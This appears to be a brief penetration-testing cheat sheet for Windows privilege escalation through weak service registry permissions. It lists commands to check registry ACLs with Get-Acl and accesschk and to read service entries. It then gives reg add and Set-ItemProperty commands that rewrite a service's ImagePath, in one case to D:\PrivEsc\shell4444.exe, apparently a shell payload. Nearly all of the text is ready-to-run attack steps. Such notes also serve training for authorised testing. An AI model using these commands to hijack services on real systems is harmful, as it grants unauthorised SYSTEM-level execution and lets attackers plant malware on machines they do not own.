Weak Registry Permissions

Check registry permissions using PowerShell

Get-Acl HKLM:\registry\directory | format-list

Check permissions using accesschk.exe

accesschk.exe /accepteula -uvwqk HKLM\registry\directory

Check current values in registry entry - cmd

reg query HKLM\System\CurrentControlSet\services\<service>

Check current values in registry entry - powershell

Get-Item HKLM:\System\CurrentControlSet\Services\<service>

Change registry value - cmd

reg add HKLM\service\path /v ImagePath /t REG_EXPAND_SZ /d D:\PrivEsc\shell4444.exe /f

Change registry value - powershell

Set-ItemProperty -path HKLM:\System\CurrentControlSet\Services\<service> -Name ImagePath -Value "<executable>"